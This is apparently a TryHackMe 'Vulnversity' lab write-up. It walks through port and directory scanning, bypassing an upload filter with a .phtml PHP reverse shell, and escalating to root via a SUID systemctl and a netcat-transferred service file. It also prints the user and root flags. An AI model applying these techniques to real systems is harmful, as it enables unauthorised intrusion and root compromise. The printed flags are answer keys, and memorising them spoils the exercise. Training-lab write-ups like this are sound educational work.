TryHackMe - Vulnversity Writeup

# TryHackMe - Vulnversity Writeup https://tryhackme.com/room/vulnversity - [x] Recon - [x] Exploit - [x] Access - [x] Priv Esc ## Recon `nmap -sV 10.10.87.163` ```bash Starting Nmap 7.80 ( https://nmap.org ) at 2022-10-23 22:51 JST Nmap scan report for 10.10.87.163 Host is up (0.39s latency). Not shown: 994 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 3128/tcp open http-proxy Squid http proxy 3.5.12 3333/tcp open http Apache httpd 2.4.18 ((Ubuntu)) Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 64.44 seconds ``` ## Exploit Website is on http://10.10.87.163:3333 `gobuster -u http://10.10.87.163:3333 -w ~/wordlist/SecLists/Discovery/Web-Content/common.txt` ```bash ===================================================== Gobuster v2.0.1 OJ Reeves (@TheColonial) ===================================================== [+] Mode : dir [+] Url/Domain : http://10.10.87.163:3333/ [+] Threads : 10 [+] Wordlist : /home/ping/wordlist/SecLists/Discovery/Web-Content/common.txt [+] Status codes : 200,204,301,302,307,403 [+] Timeout : 10s ===================================================== 2022/10/23 23:01:44 Starting gobuster ===================================================== /.hta (Status: 403) /.htpasswd (Status: 403) /.htaccess (Status: 403) /css (Status: 301) /fonts (Status: 301) /images (Status: 301) /index.html (Status: 200) /internal (Status: 301) ``` `/internal` has upload form The guide told us to make a wordlist of possible php extensions ![The guide](https://i.imgur.com/ED153Nx.png) We go through them and found out that .phtml is allowed. ## Access Using the reverse shell found in [this repo](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) , we can reverse the connection and gain access to the shell of the server. We found from this that the user called "bill", and the user flag is `8bd7992fbe8a6ad22a63361004cfcedb`: ```bash $ cd home $ ls bill $ cd bill $ ls user.txt $ cat user.txt 8bd7992fbe8a6ad22a63361004cfcedb ``` ## PrivEsc Find files with SUID permissions Reference: https://www.geeksforgeeks.org/finding-files-with-suid-and-sgid-permissions-in-linux/ `find / -user root -perm -4000 -exec ls -ldb {} \; >/tmp/list.txt` ```bash -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap -rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn -rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap -rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo -rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh -rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd -rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec -rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp -rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd -rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine -rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1 -rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign -rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device -rwsr-xr-x 1 root root 76408 Jul 17 2019 /usr/lib/squid/pinger -rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper -rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic -rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su -rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g -rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 -rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount -rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping -rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount -rwsr-xr-x 1 root root 35600 Mar 6 2017 /sbin/mount.cifs ``` We use the `root.service` from [here](https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740) to escalate the privilege to root (we netcat from the server's rev shell to upload our file) `nc -vl 44444 > root.service` - on the rev shell `nc -n 10.10.87.163 44444 < root.service` on our machine and then nc listen at port 9999 Finally, on the rev shell: ```bash /bin/systemctl enable /tmp/root.service /bin/systemctl start root ``` We would then get root on the nc listen, and we would get root. The root flag is `a58ff8579f0a9270368d33a9966c7fd5` ```bash root@vulnuniversity:/# cd root cd root root@vulnuniversity:~# ls ls root.txt root@vulnuniversity:~# cat root.txt cat root.txt a58ff8579f0a9270368d33a9966c7fd5 ```